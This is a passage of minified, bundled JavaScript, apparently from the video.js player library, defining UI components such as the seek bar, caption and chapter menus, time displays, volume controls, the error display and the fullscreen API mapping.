instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../slider/slider.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("./load-progress-bar.js"),l=(d(k),a("./play-progress-bar.js")),m=(d(l),a("../../utils/fn.js")),n=d(m),o=a("../../utils/format-time.js"),p=d(o),q=a("../../utils/round-float.js"),r=d(q),s=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateARIAAttributes),c.ready(n.bind(this,this.updateARIAAttributes))}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-progress-holder","aria-label":"video progress bar"})},b.prototype.updateARIAAttributes=function(){var a=this.player_.scrubbing()?this.player_.getCache().currentTime:this.player_.currentTime();this.el_.setAttribute("aria-valuenow",r["default"](100*this.getPercent(),2)),this.el_.setAttribute("aria-valuetext",p["default"](a,this.player_.duration()))},b.prototype.getPercent=function(){var a=this.player_.currentTime()/this.player_.duration();return a>=1?1:a},b.prototype.handleMouseDown=function(b){a.prototype.handleMouseDown.call(this,b),this.player_.scrubbing(!0),this.videoWasPlaying=!this.player_.paused(),this.player_.pause()},b.prototype.handleMouseMove=function(a){var b=this.calculateDistance(a)*this.player_.duration();b===this.player_.duration()&&(b-=.1),this.player_.currentTime(b)},b.prototype.handleMouseUp=function(b){a.prototype.handleMouseUp.call(this,b),this.player_.scrubbing(!1),this.videoWasPlaying&&this.player_.play()},b.prototype.stepForward=function(){this.player_.currentTime(this.player_.currentTime()+5)},b.prototype.stepBack=function(){this.player_.currentTime(this.player_.currentTime()-5)},b}(h["default"]);s.prototype.options_={children:{loadProgressBar:{},playProgressBar:{}},barName:"playProgressBar"},s.prototype.playerEvent="timeupdate",j["default"].registerComponent("SeekBar",s),c["default"]=s,b.exports=c["default"]},{"../../component.js":52,"../../slider/slider.js":96,"../../utils/fn.js":113,"../../utils/format-time.js":114,"../../utils/round-float.js":118,"./load-progress-bar.js":60,"./play-progress-bar.js":61}],64:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./spacer.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-custom-control-spacer "+a.prototype.buildCSSClass.call(this)},b.prototype.createEl=function(){return a.prototype.createEl.call(this,{className:this.buildCSSClass()})},b}(h["default"]);j["default"].registerComponent("CustomControlSpacer",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"./spacer.js":65}],65:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-spacer "+a.prototype.buildCSSClass.call(this)},b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:this.buildCSSClass()})},b}(h["default"]);h["default"].registerComponent("Spacer",i),c["default"]=i,b.exports=c["default"]},{"../../component.js":52}],66:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(c,d){e(this,b),d.track={kind:d.kind,player:c,label:d.kind+" settings","default":!1,mode:"disabled"},a.call(this,c,d),this.addClass("vjs-texttrack-settings")}return f(b,a),b.prototype.handleClick=function(){this.player().getChild("textTrackSettings").show()},b}(h["default"]);j["default"].registerComponent("CaptionSettingsMenuItem",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"./text-track-menu-item.js":73}],67:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-button.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("./caption-settings-menu-item.js"),l=d(k),m=function(a){function b(c,d,f){e(this,b),a.call(this,c,d,f),this.el_.setAttribute("aria-label","Captions Menu")}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-captions-button "+a.prototype.buildCSSClass.call(this)},b.prototype.update=function(){var b=2;a.prototype.update.call(this),this.player().tech&&this.player().tech.featuresNativeTextTracks&&(b=1),this.items&&this.items.length>b?this.show():this.hide()},b.prototype.createItems=function(){var b=[];return this.player().tech&&this.player().tech.featuresNativeTextTracks||b.push(new l["default"](this.player_,{kind:this.kind_})),a.prototype.createItems.call(this,b)},b}(h["default"]);m.prototype.kind_="captions",m.prototype.controlText_="Captions",j["default"].registerComponent("CaptionsButton",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"./caption-settings-menu-item.js":66,"./text-track-button.js":72}],68:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-button.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("./text-track-menu-item.js"),l=d(k),m=a("./chapters-track-menu-item.js"),n=d(m),o=a("../../menu/menu.js"),p=d(o),q=a("../../utils/dom.js"),r=d(q),s=a("../../utils/fn.js"),t=d(s),u=a("../../utils/to-title-case.js"),v=d(u),w=a("global/window"),x=d(w),y=function(a){function 
b(c,d,f){e(this,b),a.call(this,c,d,f),this.el_.setAttribute("aria-label","Chapters Menu")}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-chapters-button "+a.prototype.buildCSSClass.call(this)},b.prototype.createItems=function(){var a=[],b=this.player_.textTracks();if(!b)return a;for(var c=0;c<b.length;c++){var d=b[c];d.kind===this.kind_&&a.push(new l["default"](this.player_,{track:d}))}return a},b.prototype.createMenu=function(){for(var a=this.player_.textTracks()||[],b=void 0,c=this.items=[],d=0,e=a.length;e>d;d++){var f=a[d];if(f.kind===this.kind_){if(f.cues){b=f;break}f.mode="hidden",x["default"].setTimeout(t.bind(this,function(){this.createMenu()}),100)}}var g=this.menu;if(void 0===g&&(g=new p["default"](this.player_),g.contentEl().appendChild(r.createEl("li",{className:"vjs-menu-title",innerHTML:v["default"](this.kind_),tabIndex:-1}))),b){for(var h=b.cues,i=void 0,d=0,e=h.length;e>d;d++){i=h[d];var j=new n["default"](this.player_,{track:b,cue:i});c.push(j),g.addChild(j)}this.addChild(g)}return this.items.length>0&&this.show(),g},b}(h["default"]);y.prototype.kind_="chapters",y.prototype.controlText_="Chapters",j["default"].registerComponent("ChaptersButton",y),c["default"]=y,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu.js":91,"../../utils/dom.js":111,"../../utils/fn.js":113,"../../utils/to-title-case.js":120,"./chapters-track-menu-item.js":69,"./text-track-button.js":72,"./text-track-menu-item.js":73,"global/window":2}],69:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../menu/menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("../../utils/fn.js"),l=d(k),m=function(a){function b(c,d){e(this,b);var f=d.track,g=d.cue,h=c.currentTime();d.label=g.text,d.selected=g.startTime<=h&&h<g.endTime,a.call(this,c,d),this.track=f,this.cue=g,f.addEventListener("cuechange",l.bind(this,this.update))}return f(b,a),b.prototype.handleClick=function(){a.prototype.handleClick.call(this),this.player_.currentTime(this.cue.startTime),this.update(this.cue.startTime)},b.prototype.update=function(){var a=this.cue,b=this.player_.currentTime();this.selected(a.startTime<=b&&b<a.endTime)},b}(h["default"]);j["default"].registerComponent("ChaptersTrackMenuItem",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-item.js":90,"../../utils/fn.js":113}],70:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(c,d){e(this,b),d.track={kind:d.kind,player:c,label:d.kind+" off","default":!1,mode:"disabled"},a.call(this,c,d),this.selected(!0)}return f(b,a),b.prototype.handleTracksChange=function(){for(var 
a=this.player().textTracks(),b=!0,c=0,d=a.length;d>c;c++){var e=a[c];if(e.kind===this.track.kind&&"showing"===e.mode){b=!1;break}}this.selected(b)},b}(h["default"]);j["default"].registerComponent("OffTextTrackMenuItem",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"./text-track-menu-item.js":73}],71:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./text-track-button.js"),h=d(g),i=a("../../component.js"),j=d(i),k=function(a){function b(c,d,f){e(this,b),a.call(this,c,d,f),this.el_.setAttribute("aria-label","Subtitles Menu")}return f(b,a),b.prototype.buildCSSClass=function(){return"vjs-subtitles-button "+a.prototype.buildCSSClass.call(this)},b}(h["default"]);k.prototype.kind_="subtitles",k.prototype.controlText_="Subtitles",j["default"].registerComponent("SubtitlesButton",k),c["default"]=k,b.exports=c["default"]},{"../../component.js":52,"./text-track-button.js":72}],72:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../menu/menu-button.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("../../utils/fn.js"),l=d(k),m=a("./text-track-menu-item.js"),n=d(m),o=a("./off-text-track-menu-item.js"),p=d(o),q=function(a){function b(c,d){e(this,b),a.call(this,c,d);var f=this.player_.textTracks();if(this.items.length<=1&&this.hide(),f){var g=l.bind(this,this.update);f.addEventListener("removetrack",g),f.addEventListener("addtrack",g),this.player_.on("dispose",function(){f.removeEventListener("removetrack",g),f.removeEventListener("addtrack",g)})}}return f(b,a),b.prototype.createItems=function(){var a=void 0===arguments[0]?[]:arguments[0];a.push(new p["default"](this.player_,{kind:this.kind_}));var b=this.player_.textTracks();if(!b)return a;for(var c=0;c<b.length;c++){var d=b[c];d.kind===this.kind_&&a.push(new n["default"](this.player_,{track:d}))}return a},b}(h["default"]);j["default"].registerComponent("TextTrackButton",q),c["default"]=q,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-button.js":89,"../../utils/fn.js":113,"./off-text-track-menu-item.js":70,"./text-track-menu-item.js":73}],73:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var 
g=a("../../menu/menu-item.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("../../utils/fn.js"),l=d(k),m=a("global/window"),n=d(m),o=a("global/document"),p=d(o),q=function(a){function b(c,d){var f=this;e(this,b);var g=d.track,h=c.textTracks();d.label=g.label||g.language||"Unknown",d.selected=g["default"]||"showing"===g.mode,a.call(this,c,d),this.track=g,h&&!function(){var a=l.bind(f,f.handleTracksChange);h.addEventListener("change",a),f.on("dispose",function(){h.removeEventListener("change",a)})}(),h&&void 0===h.onchange&&!function(){var a=void 0;f.on(["tap","click"],function(){if("object"!=typeof n["default"].Event)try{a=new n["default"].Event("change")}catch(b){}a||(a=p["default"].createEvent("Event"),a.initEvent("change",!0,!0)),h.dispatchEvent(a)})}()}return f(b,a),b.prototype.handleClick=function(b){var c=this.track.kind,d=this.player_.textTracks();if(a.prototype.handleClick.call(this,b),d)for(var e=0;e<d.length;e++){var f=d[e];f.kind===c&&(f.mode=f===this.track?"showing":"disabled")}},b.prototype.handleTracksChange=function(){this.selected("showing"===this.track.mode)},b}(h["default"]);j["default"].registerComponent("TextTrackMenuItem",q),c["default"]=q,b.exports=c["default"]},{"../../component.js":52,"../../menu/menu-item.js":90,"../../utils/fn.js":113,"global/document":1,"global/window":2}],74:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/dom.js"),j=d(i),k=a("../../utils/format-time.js"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateContent)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-current-time vjs-time-control vjs-control"});return this.contentEl_=j.createEl("div",{className:"vjs-current-time-display",innerHTML:'<span class="vjs-control-text">Current Time </span>0:00',"aria-live":"off"}),b.appendChild(this.contentEl_),b},b.prototype.updateContent=function(){var a=this.player_.scrubbing?this.player_.getCache().currentTime:this.player_.currentTime(),b=this.localize("Current Time"),c=l["default"](a,this.player_.duration());this.contentEl_.innerHTML='<span class="vjs-control-text">'+b+"</span> "+c},b}(h["default"]);h["default"].registerComponent("CurrentTimeDisplay",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"../../utils/dom.js":111,"../../utils/format-time.js":114}],75:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/dom.js"),j=d(i),k=a("../../utils/format-time.js"),l=d(k),m=function(a){function 
b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateContent),this.on(c,"loadedmetadata",this.updateContent)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-duration vjs-time-control vjs-control"});return this.contentEl_=j.createEl("div",{className:"vjs-duration-display",innerHTML:'<span class="vjs-control-text">'+this.localize("Duration Time")+"</span> 0:00","aria-live":"off"}),b.appendChild(this.contentEl_),b},b.prototype.updateContent=function(){var a=this.player_.duration();if(a){var b=this.localize("Duration Time"),c=l["default"](a);this.contentEl_.innerHTML='<span class="vjs-control-text">'+b+"</span> "+c}},b}(h["default"]);h["default"].registerComponent("DurationDisplay",m),c["default"]=m,b.exports=c["default"];
},{"../../component.js":52,"../../utils/dom.js":111,"../../utils/format-time.js":114}],76:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("../../utils/dom.js"),j=d(i),k=a("../../utils/format-time.js"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"timeupdate",this.updateContent)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-remaining-time vjs-time-control vjs-control"});return this.contentEl_=j.createEl("div",{className:"vjs-remaining-time-display",innerHTML:'<span class="vjs-control-text">'+this.localize("Remaining Time")+"</span> -0:00","aria-live":"off"}),b.appendChild(this.contentEl_),b},b.prototype.updateContent=function(){if(this.player_.duration()){var a=this.localize("Remaining Time"),b=l["default"](this.player_.remainingTime());this.contentEl_.innerHTML='<span class="vjs-control-text">'+a+"</span> -"+b}},b}(h["default"]);h["default"].registerComponent("RemainingTimeDisplay",m),c["default"]=m,b.exports=c["default"]},{"../../component.js":52,"../../utils/dom.js":111,"../../utils/format-time.js":114}],77:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-time-control vjs-time-divider",innerHTML:"<div><span>/</span></div>"})},b}(h["default"]);h["default"].registerComponent("TimeDivider",i),c["default"]=i,b.exports=c["default"]},{"../../component.js":52}],78:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../slider/slider.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("../../utils/fn.js"),l=d(k),m=a("../../utils/round-float.js"),n=d(m),o=a("./volume-level.js"),p=(d(o),function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"volumechange",this.updateARIAAttributes),c.ready(l.bind(this,this.updateARIAAttributes))}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-volume-bar","aria-label":"volume 
level"})},b.prototype.handleMouseMove=function(a){this.player_.muted()&&this.player_.muted(!1),this.player_.volume(this.calculateDistance(a))},b.prototype.getPercent=function(){return this.player_.muted()?0:this.player_.volume()},b.prototype.stepForward=function(){this.player_.volume(this.player_.volume()+.1)},b.prototype.stepBack=function(){this.player_.volume(this.player_.volume()-.1)},b.prototype.updateARIAAttributes=function(){this.el_.setAttribute("aria-valuenow",n["default"](100*this.player_.volume(),2)),this.el_.setAttribute("aria-valuetext",n["default"](100*this.player_.volume(),2)+"%")},b}(h["default"]));p.prototype.options_={children:{volumeLevel:{}},barName:"volumeLevel"},p.prototype.playerEvent="volumechange",j["default"].registerComponent("VolumeBar",p),c["default"]=p,b.exports=c["default"]},{"../../component.js":52,"../../slider/slider.js":96,"../../utils/fn.js":113,"../../utils/round-float.js":118,"./volume-level.js":80}],79:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("./volume-bar.js"),j=(d(i),function(a){function b(c,d){e(this,b),a.call(this,c,d),c.tech&&c.tech.featuresVolumeControl===!1&&this.addClass("vjs-hidden"),this.on(c,"loadstart",function(){c.tech.featuresVolumeControl===!1?this.addClass("vjs-hidden"):this.removeClass("vjs-hidden")})}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-volume-control vjs-control"})},b}(h["default"]));j.prototype.options_={children:{volumeBar:{}}},h["default"].registerComponent("VolumeControl",j),c["default"]=j,b.exports=c["default"]},{"../../component.js":52,"./volume-bar.js":78}],80:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-volume-level",innerHTML:'<span class="vjs-control-text"></span>'})},b}(h["default"]);h["default"].registerComponent("VolumeLevel",i),c["default"]=i,b.exports=c["default"]},{"../../component.js":52}],81:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var 
g=a("../button.js"),h=(d(g),a("../component.js")),i=d(h),j=a("../menu/menu.js"),k=d(j),l=a("../menu/menu-button.js"),m=d(l),n=a("./mute-toggle.js"),o=d(n),p=a("./volume-control/volume-bar.js"),q=d(p),r=function(a){function b(c){var d=void 0===arguments[1]?{}:arguments[1];e(this,b),void 0===d.vertical&&(d.vertical=d.inline?!1:!0),d.volumeBar=d.volumeBar||{},d.volumeBar.vertical=!!d.vertical,a.call(this,c,d),this.on(c,"volumechange",this.volumeUpdate),c.tech&&c.tech.featuresVolumeControl===!1&&this.addClass("vjs-hidden"),this.on(c,"loadstart",function(){c.tech.featuresVolumeControl===!1?this.addClass("vjs-hidden"):this.removeClass("vjs-hidden")}),this.addClass("vjs-menu-button")}return f(b,a),b.prototype.buildCSSClass=function(){var b="";return b=this.options_.vertical?"vjs-volume-menu-button-vertical":"vjs-volume-menu-button-horizontal","vjs-volume-menu-button "+a.prototype.buildCSSClass.call(this)+" "+b},b.prototype.createMenu=function(){var a=new k["default"](this.player_,{contentElType:"div"}),b=new q["default"](this.player_,this.options_.volumeBar);return b.on("focus",function(){a.lockShowing()}),b.on("blur",function(){a.unlockShowing()}),a.addChild(b),a},b.prototype.handleClick=function(){o["default"].prototype.handleClick.call(this),a.prototype.handleClick.call(this)},b}(m["default"]);r.prototype.volumeUpdate=o["default"].prototype.update,r.prototype.controlText_="Mute",i["default"].registerComponent("VolumeMenuButton",r),c["default"]=r,b.exports=c["default"]},{"../button.js":51,"../component.js":52,"../menu/menu-button.js":89,"../menu/menu.js":91,"./mute-toggle.js":56,"./volume-control/volume-bar.js":78}],82:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./component"),h=d(g),i=a("./utils/dom.js"),j=d(i),k=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.update(),this.on(c,"error",this.update)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-error-display"});return this.contentEl_=j.createEl("div"),b.appendChild(this.contentEl_),b},b.prototype.update=function(){this.player().error()&&(this.contentEl_.innerHTML=this.localize(this.player().error().message))},b}(h["default"]);h["default"].registerComponent("ErrorDisplay",k),c["default"]=k,b.exports=c["default"]},{"./component":52,"./utils/dom.js":111}],83:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./utils/events.js"),f=d(e),g=function(){};g.prototype.allowedEvents_={},g.prototype.on=function(a,b){var c=this.addEventListener;this.addEventListener=Function.prototype,f.on(this,a,b),this.addEventListener=c},g.prototype.addEventListener=g.prototype.on,g.prototype.off=function(a,b){f.off(this,a,b)},g.prototype.removeEventListener=g.prototype.off,g.prototype.one=function(a,b){f.one(this,a,b)},g.prototype.trigger=function(a){var b=a.type||a;"string"==typeof 
a&&(a={type:b}),a=f.fixEvent(a),this.allowedEvents_[b]&&this["on"+b]&&this["on"+b](a),f.trigger(this,a)},g.prototype.dispatchEvent=g.prototype.trigger,c["default"]=g,b.exports=c["default"]},{"./utils/events.js":112}],84:[function(a,b,c){"use strict";c.__esModule=!0;var d=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.super_=b)},e=function(a){var b=void 0===arguments[1]?{}:arguments[1],c=function(){a.apply(this,arguments)},e={};"object"==typeof b?(b.constructor!==Object.prototype.constructor&&(c=b.constructor),e=b):"function"==typeof b&&(c=b),d(c,a);for(var f in e)e.hasOwnProperty(f)&&(c.prototype[f]=e[f]);return c};c["default"]=e,b.exports=c["default"]},{}],85:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;for(var e=a("global/document"),f=d(e),g={},h=[["requestFullscreen","exitFullscreen","fullscreenElement","fullscreenEnabled","fullscreenchange","fullscreenerror"],["webkitRequestFullscreen","webkitExitFullscreen","webkitFullscreenElement","webkitFullscreenEnabled","webkitfullscreenchange","webkitfullscreenerror"],["webkitRequestFullScreen","webkitCancelFullScreen","webkitCurrentFullScreenElement","webkitCancelFullScreen","webkitfullscreenchange","webkitfullscreenerror"],["mozRequestFullScreen","mozCancelFullScreen","mozFullScreenElement","mozFullScreenEnabled","mozfullscreenchange","mozfullscreenerror"],["msRequestFullscreen","msExitFullscreen","msFullscreenElement","msFullscreenEnabled","MSFullscreenChange","MSFullscreenError"]],i=h[0],j=void 0,k=0;k<h.length;k++)if(h[k][1]in f["default"]){j=h[k];break}if(j)for(var k=0;k<j.length;k++)g[i[k]]=j[k];c["default"]=g,b.exports=c["default"]},{"global/document":1}],86:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("global/document"),f=d(e),g=a("global/window"),h=d(g),i=h["default"].navigator;c["default"]={techOrder:["html5","flash"],html5:{},flash:{},defaultVolume:0,inactivityTimeout:2e3,playbackRates:[],children:{mediaLoader:{},posterImage:{},textTrackDisplay:{},loadingSpinner:{},bigPlayButton:{},controlBar:{},errorDisplay:{},textTrackSettings:{}},language:f["default"].getElementsByTagName("html")[0].getAttribute("lang")||i.languages&&i.languages[0]||i.userLanguage||i.language||"en",languages:{},notSupportedMessage:"No compatible source was found for this video."},b.exports=c["default"]},{"global/document":1,"global/window":2}],87:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new 